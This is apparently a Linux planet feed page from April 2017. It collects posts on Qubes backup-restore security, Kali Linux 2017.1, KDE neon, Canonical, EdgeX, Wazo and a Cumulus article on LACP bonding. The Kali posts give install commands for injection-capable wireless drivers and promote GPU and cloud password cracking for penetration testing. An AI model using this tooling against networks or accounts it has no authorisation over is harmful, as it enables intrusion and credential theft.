Qubes architecture has been designed to prevent level 0 attacks, long before we decided to tackle the problem of malicious backups. This is achieved both through careful compartmentalization, as well as through the actual architecture of the backup system, which assumes that whatever domain (VM) that provides the backup should not be trusted.

Level 1 attacks mentioned above is more problematic. The primary attack surface in case of backup restore procedure on Qubes is parsing of the qubes.xml that is part of the backup and which contains crucial information about the VMs being restored (which template they are based on, which network VMs they should be connected to, etc). In case of normal (i.e. non-paranoid mode) backup restoration, even though the backup file is being served from an untrusted entity (e.g. a usbvm), the attacker cannot control the qubes.xml file, because the whole backup is crypto authenticated. Unfortunately, in the scenario we’re considering here, this protection doesn’t work anymore, as explained above.

In order to properly defend against attacks on the XML parser in the backup restoring code, we need to sandbox the code which does the actual parsing. Yet, it’s somehow problematic how such a sandboxed code could still perform its stated goal or creating the actual restored VMs. Luckily, the new Admin (aka Mgmt) API, which we have introduced in Qubes 4.0, is an ideal mechanism for this job.

Unfortunately this API is not available on Qubes 3.2, which means we cannot easily sandbox the backup parsing code there. In this respect we would need to trust the Python’s implementation to be somehow correct and not exploitable.

Finally, there is Level 2 of potential attacks. These would exploit potential semantic vulnerabilities in backup restoration, such as injecting a malformed property name for one of the to-be-restored VMs in such a way that, when actually used later by the Qubes core code, this might result in the attacker’s code execution. For example some properties are used to build paths (e.g. kernel name for PVMs), or perhaps are passed to eval()-like functions.

In order to prevent such logic vulnerabilities, we have decided to write from scratch special code (SafeQubesVmCollection()) which parses the backup and creates VMs from it. The difference which makes this code special is that it only takes into account some minimal set of properties, i.e. those which we consider safe (for example it ignores PCI device assignments, doesn’t restore firewall rules, etc). Additionally it skips dom0’s home directory and implements other limitations, as already mentioned earlier.

One nice thing about the upcoming Qubes 4.0 core stack and the Admin API is that it is trivial to take this safe backup restoration code and run it in other-than-dom0 VM, e.g. a Disposable VM. Then, assuming this VM will be allowed to request specific Admin API qrexec services (e.g. mgmt.vm.Create.*), everything will work as before. But, this time, the XML parser will run sandboxed within a VM, not in Dom0, as in Qubes 3.2. This is illustrated on the diagram below.

Qubes Paranoid Mode implementation using Admin API in Qubes 4.0


Qubes architecture provides some unique benefits when recovering from compromised (one or more) AppVMs. These include: 1) easy way to revert back to good known root filesystem for all template-based VMs, 2) ability to safely migrate select data from compromised AppVM to new VMs, 3) easy way to recover from compromised system VMs, such as net- and USB- VMs, and 4) ability to reliably upgrade vulnerable software within AppVMs by performing the upgrade in the template, instead of in the (compromised) AppVM, and then restarting the AppVM.

But even more spectacularly, the newly introduced “paranoid” backup restore mode offers a simple and generic way to recover from full system compromises.


I don’t get what’s all the fuzz about here? How is this different from any other OS?

Please (re-)read this section and summary section again.

For full system recovery, is it enough to reinstall Qubes OS still on the same hardware?

If our x86-based computers were more trustworthy, or at least more stateless, it would be enough to just reinstall the OS from scratch and stay on the same machine. Unfortunately, as of today, this might not be enough, because once the attack gained access to dom0/hypervisor, she might be able to seriously compromise the underlying hardware and persist malware in such a way that it can survive further system reinstallations.

Wait, I thought Qubes OS offered protection against these pesky SMM/firmware malware?

Correct. Qubes OS, unlike most other systems, has been designed to keep all the malware away from interacting with the real, sensitive hardware, thus preventing various BIOS/firmware attacks (even if the attacker managed to compromise one or more of the VMs). However, once there is a fatal vulnerability in the core software that is used to implement Qubes security model, e.g. in the Xen hypervisor, then this protection no longer works. Sorry.

Alright, but in practice, do I really need to get a new machine?

Unfortunately no one can provide any good answer to that question. Each user must decide by themselves.

Wouldn’t it be easier to just use Disposable VMs for everything?

Unfortunately, the “Just use Disposable VMs” is not a magical solution for all the security problems. In particular, whenever we want to persist user data/customisations/configuration across AppVM restarts (and we want to do that in majority of cases), the use of DispVMs does not provide significant benefits over traditional AppVMs. In some special scenarios this might make sense, like e.g. for the case of service VMs mentioned above. However, it doesn’t seem feasible to have a generic solution that would be able to selectively copy back and sanitize user files before a DispVM shuts down, for later use of these files in another DispVM. And without sanitization, the solution becomes equivalent to… just using a standard AppVM.

26 April, 2017 12:00AM

April 25, 2017

hackergotchi for Tanglu developers

Tanglu developers

Cutelyst 1.6.0 released, to infinity and beyond!

Once 1.5.0 was release I thought the next release would be a small one, it started with a bunch of bug fixes, Simon Wilper made a contribution to Utils::Sql, basically when things get out to production you find bugs, so there were tons of fixes to WSGI module.

Then TechEmpower benchmarks first preview for round 14 came out, Cutelyst performance was great, so I was planning to release 1.6.0 as it was but second preview fixed a bug that Cutelyst results were scaled up, so our performance was worse than on round 13, and that didn’t make sense since now it had jemalloc and a few other improvements.

Actually the results on the 40+HT core server were close to the one I did locally with a single thread.

Looking at the machine state it was clear that only a few (9) workers were running at the same time, I then decided to create an experimental connection balancer for threads. Basically the main thread accepts incoming connections and evenly pass them to each thread, this of course puts a new bottleneck on the main thread. Once the code was ready which end up improving other parts of WSGI I became aware of SO_REUSEPORT.

The socket option reuse port is available on Linux >3.9, and different from BSD it implements a simple load balancer. This obsoleted my thread balancer but it still useful on !Linux. This option is also nicer since it works for process as well.

With 80 cores there’s still the chance that the OS scheduler put most of your threads on the same cores, and maybe even move them when under load. So an option for setting a CPU affinity was also added, this allows for each work be pinned to one or more cores evenly. It uses the same logic as uwsgi.

Now that WSGI module supported all these features preview 3 of benchmarks came out and the results where still terrible… further investigation revealed that a variable supposed to be set with CPU core count was set to 8 instead of 80. I’m sure all this work did improve performance for servers with a lots of cores so in the end the wrong interpretation was good after all 🙂

Preview 4 came out and we are back to the top, I’ll do another post once it’s final.

Code name “to infinity and beyond” came to head due scalability options it got 😀

Last but not least I did my best to get rid of doxygen missing documentation warnings.

Have fun https://github.com/cutelyst/cutelyst/archive/v1.6.0.tar.gz

25 April, 2017 08:09PM by dantti

hackergotchi for Ubuntu developers

Ubuntu developers

Canonical Design Team: Designing in the open

Over the past year, a change has emerged in the design team here at Canonical: we’ve started designing our websites and apps in public GitHub repositories, and therefore sharing the entire design process with the world.

One of the main things we wanted to improve was the design sign off process whilst increasing visibility for developers of which design was the final one among numerous iterations and inconsistent labelling of files and folders.

Here is the process we developed and have been using on multiple projects.

The process

Design work items are initiated by creating a GitHub issue on the design repository relating to the project. Each project consists of two repositories: one for the code base and another for designs. The work item issue contains a short descriptive title followed by a detailed description of the problem or feature.

Once the designer has created one or more designs to present, they upload them to the issue with a description. Each image is titled with a version number to help reference in subsequent comments.

Whenever the designer updates the GitHub issue everyone who is watching the project receives an email update. It is important for anyone interested or with a stake in the project to watch the design repositories that are relevant to them.

The designer can continue to iterate on the task safe in the knowledge that everyone can see the designs in their own time and provide feedback if needed. The feedback that comes in at this stage is welcomed, as early feedback is usually better than late.

As iterations of the design are created, the designer simply adds them to the existing issue with a comment of the changes they made and any feedback from any review meetings.

Table with actions design from MAAS project

When the design is finalised a pull request is created and linked to the GitHub issue, by adding “Fixes #111” (where #111 is the number of the original issue) to the pull request description. The pull request contains the final design in a folder structure that makes sense for the project.

Just like with code, the pull request is then approved by another designer or the person with the final say. This may seem like an extra step, but it allows another person to look through the issue and make sure the design completes the design goal. On smaller teams, this pull request can be approved by a stakeholder or developer.

Once the pull request is approved it can be merged. This will close and archive the issue and add the final design to the code section of the design repository.

That’s it!


If all designers and developers of a project subscribe to the design repository, they will be included in the iterative design process with plenty of email reminders. This increases the visibility of designs in progress to stakeholders, developers and other designers, allowing for wider feedback at all stages of the design process.

Another benefit of this process is having a full history of decisions made and the evolution of a design all contained within a single page.

If your project is open source, this process makes your designs available to your community or anyone that is interested in the product automatically. This means that anyone who wants to contribute to the project has access to all the information and assets as the team members.

The code section of the design repository becomes the home for all signed off designs. If a developer is ever unsure as to what something should look like, they can reference the relevant folder in the design repository and be confident that it is the latest design.

Canonical is largely a company of remote workers and sometimes conversations are not documented, this means some people will be aware of the decisions and conversations. This design process has helped with the issue, as designs and discussions are all in a single place, with nicely laid out emails for all changes that anyone may be interested.


This process has helped our team improve velocity and transparency. Is this something you’ve considered or have done in your own projects? Let us know in the comments, we’d love to hear of any way we can improve the process.

25 April, 2017 05:27PM

hackergotchi for Kali Linux

Kali Linux

Kali Linux 2017.1 Release

Finally, it’s here! We’re happy to announce the availability of the Kali Linux 2017.1 rolling release, which brings with it a bunch of exciting updates and features. As with all new releases, you have the common denominator of updated packages, an updated kernel that provides more and better hardware support, as well as a slew of updated tools – but this release has a few more surprises up its sleeve.

 Support for RTL8812AU Wireless Card Injection

A while back, we received a feature request asking for the inclusion of drivers for RTL8812AU wireless chipsets. These drivers are not part of the standard Linux kernel, and have been modified to allow for injection. Why is this a big deal? This chipset supports 802.11 AC, making this one of the first drivers to bring injection-related wireless attacks to this standard, and with companies such as ALFA making the AWUS036ACH wireless cards, we expect this card to be an arsenal favourite.

The driver can be installed using the following commands:

apt-get update
apt install realtek-rtl88xxau-dkms

Streamlined Support for CUDA GPU Cracking

Installing proprietary graphics drivers has always been a source of frustration in Kali. Fortunately, improvements in packaging have made this process seamless – allowing our users a streamlined experience with GPU cracking. Together with supported hardware, tools such as Hashcat and Pyrit can take full advantage of NVIDIA GPUs within Kali. For more information about this new feature, check out the related blog post and updated official documentation.

Amazon AWS and Microsoft Azure Availability (GPU Support)

Due to the increasing popularity of using cloud-based instances for password cracking, we decided to focus our efforts into streamlining Kali’s approach. We noticed that Amazon’s AWS P2-Series and Microsoft’s Azure NC-Series allow pass-through GPU support so we made corresponding AWS and Azure images of Kali that support CUDA GPU cracking out of the box. You can check out our Cracking in the Cloud with CUDA GPUs post we released a few weeks back for more information.

OpenVAS 9 Packaged in Kali Repositories

One of the most lacking tool categories in Kali (as well as the open-source arena at large) is a fully-fledged vulnerability scanner. We’ve recently packaged OpenVAS 9 (together with a multitude of dependencies) and can happily say that, in our opinion, the OpenVAS project has matured significantly. We still do not include OpenVAS in the default Kali release due to its large footprint, but OpenVAS can easily be downloaded and installed using the following commands:

apt-get update
apt install openvas

Kali Linux Revealed Book and Online Course

To those of you following our recent announcement regarding the Kali Linux Certified Professional program, we’re happy to say that we’re spot on schedule. The Kali Linux Revealed book will be available in early July, and the free online version will be available shortly after that. We’re really excited about both the book and the online course and are anxiously waiting for this release – it marks a real cornerstone for us, as our project continues to grow and mature. To keep updated regarding the release of both the book and the online course, make sure to follow us on Twitter.

Kali Linux Revealed

Kali Linux at Black Hat Vegas 2017

This year, we are fortunate enough to debut our first official Kali Linux training at the Black Hat conference in Las Vegas, 2017. This in-depth, four day course will focus on the Kali Linux platform itself (as opposed to the tools, or penetration testing techniques), and help you understand and maximize the usage of Kali from the ground up. Delivered by Mati Aharoni and Johnny Long, in this four day class you will learn to become a Kali Linux ninja. We will also be delivering another Dojo event this year – more details about that to come at a later date.

Kali ISO Downloads, Virtual Machines and ARM Images

The Kali Rolling 2017.1 release can be downloaded via our official Kali Download page. If you missed it, our repositories have recently been updated to support HTTPS, as well as an HTTPS apt transport. This release, we have also updated our Kali Virtual Images and Kali ARM Images downloads. As usual, if you’ve got Kali already installed, all you need to do to be fully updated is:

apt update
apt dist-upgrade

We hope you enjoy this fine release!

25 April, 2017 04:35PM by muts

hackergotchi for Ubuntu developers

Ubuntu developers

Daniel Pocock: FSFE Fellowship Representative, OSCAL'17 and other upcoming events

The Free Software Foundation of Europe has just completed the process of electing a new fellowship representative to the General Assembly (GA) and I was surprised to find that out of seven very deserving candidates, members of the fellowship have selected me to represent them on the GA.

I'd like to thank all those who voted, the other candidates and Erik Albers for his efforts to administer this annual process.

Please consider becoming an FSFE fellow or donor

The FSFE runs on the support of both volunteers and financial donors, including organizations and individual members of the fellowship program. The fellowship program is not about money alone, it is an opportunity to become more aware of and involved in the debate about technology's impact on society, for better or worse. Developers, users and any other supporters of the organization's mission are welcome to join, here is the form. You don't need to be a fellow or pay any money to be an active part of the free software community and FSFE events generally don't exclude non-members, nonetheless, becoming a fellow gives you a stronger voice in processes such as this annual election.

Attending OSCAL'17, Tirana

During the election period, I promised to keep on doing the things I already do: volunteering, public speaking, mentoring, blogging and developing innovative new code. During May I hope to attend several events, including OSCAL'17 in Tirana, Albania on 13-14 May. I'll be running a workshop there on the Debian Hams blend and Software Defined Radio. Please come along and encourage other people you know in the region to consider attending.

What is your view on the Fellowship and FSFE structure?

Several candidates made comments about the Fellowship program and the way individual members and volunteers are involved in FSFE governance. This is not a new topic. Debate about this topic is very welcome and I would be particularly interested to hear any concerns or ideas for improvement that people may contribute. One of the best places to share these ideas would be through the FSFE's discussion list.

In any case, the fellowship representative can not single-handedly overhaul the organization. I hope to be a constructive part of the team and that whenever my term comes to an end, the organization and the free software community in general will be stronger and happier in some way.

25 April, 2017 12:57PM

The Fridge: Ubuntu Weekly Newsletter Issue 505

Welcome to the Ubuntu Weekly Newsletter. This is issue #505 for the weeks April 10 – 23, 2017, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Simon Quigley
  • Chris Guiver
  • Jim Connett
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

25 April, 2017 02:31AM

April 24, 2017

hackergotchi for ArcheOS


ArcheOS Hypatia Virtual Globe: Cesium

Hi all,
I am starting here a series of short post to show some of the features of the main software selected for ArcheOS Hypatia, trying to explain the reasons of these choices. The first category I'll deal with is the one of Virtual Globes. Among the many available options of FLOSS, one of the applications which meets the needs of archaeology is certainly Cesium. This short video shows its capability of import geolocalized 3D complex models, which is a very important possibility for archaeologist. In this example I imported in Cesium the 3D model (done with Structure from Motion) of a a small boat which lies on the bottom of an alpine lake (more info in this post).

Soon I'll post other short videos to show other features of Cesium. Have a nice evening!

24 April, 2017 08:52PM by Luca Bezzi (noreply@blogger.com)

hackergotchi for Kali Linux

Kali Linux

Kali Linux repository HTTPS support

A couple of weeks back we added more HTTPS support to our Kali infrastructure, and wanted to give our users some guidance and point out what’s new. While our Kali Linux download page (and shasums) has always been served via HTTPS, our mirror redirector has not. Now that we generate weekly images, secure access to the mirror redirector has become crucial.


This is our Kali Image Mirror Redirector. This server accepts your download requests from our official download page, and then serves your requested file from the geographically closest mirror. This is also the download point for our Kali Weekly builds – now with fresh and shiny HTTPS support. Hitting this redirector via HTTPS will redirect your request to an SSL enabled download server, while an unencrypted HTTP request will redirect to an HTTP enabled mirror. Where’s the catch? Not all donated mirrors support HTTPS, so choosing this transport may result in slower download speeds. Should downloading a Kali image over HTTP be a security concern? Not if you GPG verify your downloaded image.


As a byproduct of enabling HTTPS on cdimage.kali.org, we now also support apt HTTPS transports. This means that our actual Kali package repositories can support HTTPS – resulting in encrypted Kali updates and upgrades. Surprisingly, this does not add much security to the update / upgrade process (read here if you’re wondering why) – however it *does* add an extra layer of security, so we figured, “why not?”. To enable the apt HTTPS transport, first make sure the apt-transport-https package is installed (it’s installed by default in our weekly images and upcoming releases) and enable the HTTPS transport in your sources.list file as shown below:

root@kali:~# apt-get install apt-transport-https
root@kali:~# cat /etc/apt/sources.list
deb https://http.kali.org/kali kali-rolling main non-free contrib
# deb-src https://http.kali.org/kali kali-rolling main non-free contrib

Now any update or upgrade operation preformed against our mirrors will be HTTPS enabled:

root@kali:~# apt-get update
Hit:1 https://archive-3.kali.org/kali kali-rolling InRelease
Reading package lists... Done

As not all donated mirrors come with HTTPS support, shifting to the HTTPS transport may result in a less optimized mirror being selected for you, resulting in slower download speeds. As moving to an apt HTTPS transport does not provide much extra security, do so only if you feel you must!

24 April, 2017 02:29PM by muts

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: Canonical joins EdgeX Foundry to help unify IoT edge computing

Fragmentation is the nature of the beast in the IoT space with a variety of non-interoperable protocols, devices and vendors which are the natural results of years of evolution in the industrial space especially. However traditional standardisation processes and proprietary implementations have been the norm. But the slow nature of their progress make them a liability for the burgeoning future of IoT. For these reasons, multiple actions are being taken by many organisations to change the legacy IoT mode of operations in the quest for accelerated innovation and improved efficiencies.

To aid this progress, today, the Linux Foundation has announced a new open source software project called the EdgeX Foundry. The aim is to create an open framework and unify the marketplace to build an ecosystem of companies offering plug and play components on IoT edge solutions. The Linux Foundation has gathered over 50 companies to be the founding members of this project and Canonical is proud to be one of these.
Here at Canonical, we have been pushing for open source approaches to IoT fragmentation. Last year’s introduction of snaps is one example of this – the creation of a universal Linux packaging format to make it easy for developers to manage the distribution of their applications across devices, distros and releases. They are also safer to run and faster to install. Looking forward, we want to see snaps as the default format across the board to work on any distribution or device from IoT to desktops and beyond.

Just like snaps, the EdgeX framework is designed to run on any operating system or hardware. It can quickly and easily deliver interoperability between connected devices, applications and services across a wide range of use cases. Fellow founding member, Dell, is seeding EdgeX Foundry with its FUSE source code base consisting of more than a dozen microservices and over 125,000 lines of code.

Adopting an open source edge software platform benefits the entire IoT ecosystem incorporating the system integrators, hardware manufacturers, independent software vendors and end customers themselves who are deploying IoT edge solutions. The project is also collaborating with other relevant open source projects and industry alliances to further ensure consistency and interoperability across IoT. These include the Cloud Foundry Foundation,EnOcean Alliance and ULE Alliance.

The EdgeX platform will be on display at the Hannover Messe in Germany from April 24th-28th 2017. Head to the Dell Technologies booth in Hall 8, Stand C24 to see the main demo.


24 April, 2017 02:09PM

Ubuntu Insights: OpenStack public cloud, from Stockholm to Dubai and everywhere between

  • City Network joins the Ubuntu Certified Public Cloud (CPC) programme
  • First major CPC Partner in the Nordics

City Network, a leading European provider of OpenStack infrastructure-as-a-service (IaaS) today joined the Ubuntu Certified Public Cloud programme. Through its public cloud service ‘City Cloud’, companies across the globe can purchase server and storage capacity as needed, paying for the capacity they use and leveraging the flexibility and scalability of the OpenStack-platform.

With dedicated and OpenStack-based City Cloud nodes in the US. Europe and Asia, City Network recently launched in Dubai. As such they are now the first official Ubuntu Certified Public Cloud in the Middle East offering a pure OpenStack-based platform running on Ubuntu OpenStack. Dubai has recently become the co-location and data center location of choice for the Middle East, as Cloud, IoT, and Digitization see massive uptake and market need from public sector, enterprise and SMEs in the region.

City Network provides public, private and hybrid cloud solutions based on OpenStack from 27 data centers around the world. Through its industry specific IaaS, City Network can ensure that their customers can comply with demands originating from specific laws and regulations concerning auditing, reputability, data handling and data security such as Basel and Solvency.

City Cloud Ubuntu lovers—from Stockholm to Dubai to Tokyo—will now be able to use official Ubuntu images, always stable and with the latest OpenStack release included, to run VMs and servers on their favourite cloud provider. Users of other distros on City Cloud are also now able to move to Ubuntu, the no. 1 cloud OS, and opt-in to Ubuntu Advantage support offering, which helps leading organisations around the world to manage their Ubuntu deployments.

“The disruptions of traditional business models and the speed in digital innovations, are key drivers for the great demand in open and flexible IaaS across the globe. Therefore, I am very pleased that we are now entering the Ubuntu Certified Public Cloud program, adding yet another opportunity for our customers to run their IT-infrastructure on an open, scalable and flexible platform,” said Johan Christenson, CEO and founder of City Network.

“Canonical is passionate about bringing the best Ubuntu user experience to users of every public cloud, but is especially pleased to have an OpenStack provider such as City Cloud offering Ubuntu, the world’s most widely used guest Linux,” said Udi Nachmany, Head of Public Cloud, Canonical. “City Cloud is known for its focus on compliance, and will now bring their customers additional choice for their public infrastructure, with an official, secure, and supportable Ubuntu experience.”

Ubuntu Advantage offers enterprise-grade SLAs for business-critical workloads, access to our Landscape systems management tool, the Canonical Livepatch Service for security vulnerabilities, and much more—all available from buy.ubuntu.com.

To start using Ubuntu on the City Cloud Infrastructure please visit https://www.citycloud.com

24 April, 2017 09:04AM

hackergotchi for Wazo


Sprint Review 17.06

Hello Wazo community! Here comes the release of Wazo 17.06!

New features in this sprint

REST API: We have added a new REST API to get call logs in JSON format, instead of the current CSV format. The CSV format was mainly chosen for compatibility and JSON is easier to create new web interfaces.

Technical features

Asterisk: Asterisk was updated from 14.3.0 to 14.4.0

Important bug fixes

CTI Client: Transfers made via the client could cause Asterisk to take all CPU of the machine, blocking the transfer and losing the call, in some circumstances. Ticket reference: #6624.

Ongoing features

Call logs: We are attaching more data to the call logs, so that we can filter call logs more easily. This mainly includes filtering call logs by user, so that call logs analysis becomes less tedious. See https://api.wazo.community in section xivo-call-logs for more details.

New web interface: This web interface will only use the REST API we've been developing in the past few years, with no brittle complicated internal logic like the current web interface has: all the logic is handled by the REST APIs. This web interface will not replace the current web interface before it has all the same features, so it will take time to become the default interface. However, both web interfaces will coexist during the maturation of the new one. We'll keep you posted when the new web interface becomes usable.

Plugin management: We are currently working a plugin management service as well as a standard plugin definition that will be easy to write. The goal is to allow users to add features easily to Wazo and to be able to distribute their extensions to other users. This new system will be used to install features on the new administration interface.

The instructions for installing Wazo or upgrading Wazo are available in the documentation.

For more details about the aforementioned topics, please see the roadmap linked below.

See you at the next sprint review!


24 April, 2017 04:00AM by The Wazo Authors

April 23, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

The Fridge: Ubuntu Membership Board call for nominations

As you may know, Ubuntu Membership is a recognition of significant and sustained contribution to Ubuntu and the Ubuntu community. To this end, the Community Council recruits from our current member community for the valuable role of reviewing and evaluating the contributions of potential members to bring them on board or assist with having them achieve this goal.

We have seven members of our boards expiring from their terms , which means we need to do some restaffing of this Membership Board.

We have the following requirements for nominees:

  • be an Ubuntu member (preferably for some time)
  • be confident that you can evaluate contributions to various parts of our community
  • be committed to attending the membership meetings broad insight into the Ubuntu community at large is a plus

Additionally, those sitting on membership boards should have a proven track record of activity in the community. They have shown themselves over time to be able to work well with others and display the positive aspects of the Ubuntu Code of Conduct. They should be people who can discern character and evaluate contribution quality without emotion while engaging in an interview/discussion that communicates interest, a welcoming atmosphere, and which is marked by humanity, gentleness, and kindness. Even when they must deny applications, they should do so in such a way that applicants walk away with a sense of hopefulness and a desire to return with a more complete application rather than feeling discouraged or hurt.

To nominate yourself or somebody else (please confirm they wish to accept the nomination and state you have done so), please send a mail to the membership boards mailing list (ubuntu-membership-boards at lists.ubuntu.com). You will want to include some information about the nominee, a launchpad profile link and which time slot (20:00 or 22:00) the nominee will be able to participate in.

We will be accepting nominations through Friday May 26th at 12:00 UTC. At that time all nominations will be forwarded to the Community Council who will make the final decision and announcement.

Thanks in advance to you and to the dedication everybody has put into their roles as board members.

Originally posted to the ubuntu-news-team mailing list on Sun Apr 23 20:20:38 UTC 2017 by Michael Hall

23 April, 2017 08:30PM

Jonathan Riddell: KDE neon Translations

One of the best things about making software collaboratively is the translations.  Sure I could make a UML diagramming tool or whatever all by my own but it’s better if I let lots of other people help out and one of the best crowd-sourcing features of open community development is you get translated into many popular and obscure languages which it would cost a fortune to pay some company to do.

When KDE was monolithic is shipping translation files in separate kde-l10n tars so users would only have to install the tar for their languages and not waste disk space on all the other languages.  This didn’t work great because it’s faffy for people to work out they need to install it and it doesn’t help with all the other software on their system.  In Ubuntu we did something similar where we extracted all the translations and put them into translation packages, doing it at the distro level makes more sense than at the collection-of-things-that-KDE-ships level but still has problems when you install updated software.  So KDE has been moving to just shipping the translations along with the individual application or library which makes sense and it’s not like the disk space from the unused languages is excessive.

So when KDE neon came along we had translations for KDE frameworks and KDE Plasma straight away because those are included in the tars.  But KDE Applications still made kde-l10n tars which are separate and we quietly ignored them in the hope something better would come along, which pleasingly it now has.  KDE Applications 17.04 now ships translations in the tars for stuff which uses Frameworks 5 (i.e. the stuff we care about in neon). So KDE neon User Editions now include translations for KDE Applications too.  Not only that but Harald has done his genius and turned the releaseme tool into a library so KDE neon’s builder can use it to extract the same translation files into the developer edition packages so translators can easily try out the Git master versions of apps to see what translations look missing or broken.  There’s even an x-test language which makes xxTextxx strings so app developers can use it to check if any strings are untranslated in their applications.

The old kde-l10n packages in the Ubuntu archive would have some file clashes with the in-tar translations which would often break installs in non-English languages (I got complaints about this but not too many which makes me wonder if KDE neon attracts the sort of person who just uses their computer in English).  So I’ve built dummy empty kde-l10n packages so you can now install these without clashing files.

Still plenty to do.  docs aren’t in the Developer Edition builds.  And System Settings needs some code to make a UI for installing locales and languages of the base system, currently that needs done by hand if it’s not done at install time  (apt install language-pack-es).  But at last another important part of KDE’s software is now handled directly by KDE rather than hoping a third party will do the right thing and trying them out is pleasingly trivial.




Facebooktwittergoogle_pluslinkedinby feather

23 April, 2017 01:00PM

April 22, 2017

Cumulus Linux

Sharing state between host and upstream network: LACP part 3

So far in the previous articles, we’ve covered the initial objections to LACP a deep dive on the effect on traffic patterns in an MLAG environment without LACP/Static-LAG. In this article we’ll explore how LACP differs from all other available teaming techniques and then also show how it could’ve solved a problem in this particular deployment.

I originally set out to write this as a single article, but to explain the nuances it quickly spiraled beyond that. So I decided to split it up into a few parts.
Part1: Design choices – Which NIC teaming mode to select

Part2: How MLAG interacts with the host
• Part3: “Ships in the night” – Sharing state between host and upstream network

Ships in the night

An important element to consider is LACP is the only uplink protocol supported by VMware that directly exchanges any network state information between the host and its upstream switches. An ESXi host is also sortof a host, but also sortof a network switch (in so far as it does forward packets locally and makes path decisions for north/south traffic); here in lies the problem, we effectively have network devices forwarding packets between each other, but not exchanging much in the way of state. That can lead to some bad things…

Some of those ‘bad things’ include:
1. Exploding puppies
2. Traffic black-holing
3. Non-optimal traffic flow
4. Link/fabric oversubscription upstream in the network (in particular the ISL between the switches)
5. Probably other implications… but I think that’s enough for now.

This is also the reason I chose to write this post, I’ve seen many others describe in detail LBT vs etherchannel/LACP (Nice articles @vcdxnz01, btw), but none that go into much detail on the implications of this particular point.

The main piece of information of interest is topology change. For example. If you remove a physical NIC from a (d)VirtualSwitch, how is the network notified of this change? If a switch loses all its uplinks or is otherwise degraded, how is this notified to the hosts?

The intent here is to give the host and switches sufficient information on the current topology so they can dynamically make the best path decisions, as close to the traffic source as possible.

Without LACP, the network will need to make link forwarding decisions independently based on:

1. link state (physical port up / down)
2. mac learning

It also means that if the switch or host wants to influence each other to use an alternative path, the only mechanism available is to bring the link administratively down.

How lack of topology change notification could cause problems

say no to silos Consider the following scenario:
When one of the 10G VMNICs is removed from the vDS of the ESX (using a vCenter), in some cases it takes a long time (of the order of minutes) for the traffic to switch over. It seems strange given that MLAG should switchover the traffic in the order of seconds (usually a lot less).

What could explain this behavior? Assuming the switches are configured per the network vendor’s best practice (ie host-facing bonds) and the VMware consultant had made similar configurations/recommendations for the host config. In this case, LBT configured.

In this scenario, host-facing LACP bonds had been setup, with LACP bypass enabled. LACP bypass effectively is a “Static bond” setup, until the first LACP frame is received, then it reverts to LACP from then on. This mode is normally used to allow PXE booting and initial configuration of the host, since LACP config can only be applied once the ESXi host is licensed, added to vCenter then a DVS and configured.

Bonds and LACP part 1

Figure 1a: MLAG with Static bonds, ESX with LBT.

Bonds and LACP 2

Figure 1b: Traffic path between VM1 and VM8

The ESXi host had not been configured with LACP or IP HASH. Figure 1a shows this base topology, assuming initial MAC learning has already occurred.

With both ESXi physical NICs / uplinks in the same vSwitch, VMs (and vmkernel interfaces) could be pinned to either link but return traffic could still be received via either physical adapter, this is the default behavior of ESXi vSwitches. Figure 1b and 1c show this traffic path between VM1 and VM8.

Bonds and LACP 3

Figure 1c: Traffic flow from VM8 to VM1

The problem comes when the topology changes, say by removing an uplink from the vSwitch. The switches are completely oblivious to this change, as the host hasn’t messaged it in any way.Figure 1c: Traffic flow from VM8 to VM1.

bonds nad lACP 4

Figure 1d: The failure scenario

The packet is sent out the configured uplink1 successfully to the destination VM, but the reply path could come via NIC2, which is not part of the vSwitch, so the packet will be dropped by ESX.

In my mind there are two ways of looking at the problem:

  1. “That’s a configuration mistake”: the host config and switches don’t match, so of course there will be a problem, change the config of either the host or the switches!
  2. Shouldn’t the host message the switches somehow that I’m no longer using this port as an uplink?

Change the config
Easy! There’s a couple of options:

  1. Fix the host-config: Add the uplink back to the vSwitch or shutdown the uplink.
  2. Fix the switch-config: Remove the dual-connected config from the ToRs (and accept the consequences of orphan ports described in Part 2).

Message the topology change
This can either be achieved in a couple of ways:

  • Manually shut down the physical uplink, so switch2 no longer uses that path.
  • Enable LACP and let the LACP driver take care of it (let’s explore that a little further)

How LACP enables topology exchange
The LACP driver on the switches and the driver on the ESX host are exchanging information / status using a LACP “Data Unit” frame.

The important part is the other end of an LACP link is able to make forwarding decisions, based on the information it receives in the LACP-DU. This then provides a mechanism for an endpoint to message a change in link state and have the other side do what’s appropriate.

If a DU is not received, or an incorrect/unexpected DU is received, the link will normally be removed from the bond and it will immediately stop forwarding via that link. Let’s explore that in this particular scenario.

bonds and LACP 5

Figure 2a

In figure 2a (above), both ports are members of the same uplink group and LACP-DU’s flow to/from both ToR switches.

bonds and lacp 6

Figure 2b

Then a topology change happens at the host, which is described in figure 2b.

  1. Vmnic2 is removed from the LACP uplink group at the host “ESX1”
  2. Switch2 fails to receive a DU within the timeout window, the port is forced “proto-down”
  3. Switch2 MLAG daemon messages the topology change to Switch1.
  4. Switch2 MLAG daemon programs the MACs associated with ESX1 onto the peerlink.

ESX1 is now treated as a singly connected host, vmnic2 is not used. Figure 2c shows the traffic flow in the forward direction.

bonds and lACP 7

Figure 2c

Bonds and lacp 8

Figure 2d

Figure 2d shows the reverse traffic flow. Note that it will correctly use the peerlink.

Other scenarios
It should hopefully go without saying, but having a message protocol to advertise changes goes both ways; The network can also inform the host of any changes upstream.

For example, in the case of an MLAG daemon failure, or a split-brain scenario, you would not want the hosts forwarding assuming both links are active and working as normal. LACP allows the switches to advertise such a scenario, without necessarily having to tear down one of the local links itself (which each individual switch could easily get wrong).

bonds and lacp 9

Figure 3a

In a true split-brain scenario, one valid approach is to treat the two switches as independent again. Remember, an LACP bond can only form across a link links advertising the same SystemID, different systemID’s lets the host know it is wired to two separate switches. The host LACP driver can then make a decision which of the links to disable. This is the ideal scenario as in a true split brain, the switches may not be fully aware if its peer is or isn’t up up and forwarding. Having the host make the decision effectively adds a witness to the scenario to make the tiebreaker decision.


final bonds and lacp

Figure 3b

